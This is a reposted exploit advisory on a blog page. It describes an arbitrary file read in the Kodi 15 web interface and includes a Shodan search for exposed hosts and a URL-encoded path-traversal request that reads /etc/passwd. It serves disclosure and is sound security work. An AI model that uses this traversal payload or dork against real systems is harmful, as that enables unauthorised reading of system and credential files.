# Exploit Title: arbitrary file access kodi web interface # Shodan dork: title:kodi # Date: 25-11-2015 # Contact: https://twitter.com/mpronk89 # Software Link: http://kodi.tv/ # Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305 # Version: v15 # Tested on: linux # CVE : n/a kodi web interface vulnerable to arbitrary file read. example: <ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd for passwd (issue fixed in 2012, reintroduced in february 2015. Fixed again november 2015 for v16)
Monday, August 27, 2018
Kodi 15 - Arbitrary File Aaccess (Web Interface)
Subscribe to:
Post Comments (Atom)
Belajar seo
Alasan kenapa anda harus BELAJAR SEO
Ngeeblog Yuuk!, Anda sudah punya blog? pasti punya dong, apalagi di design sangat menarik, artikel dan konten sudah terisi dan berkuali...
No comments:
Post a Comment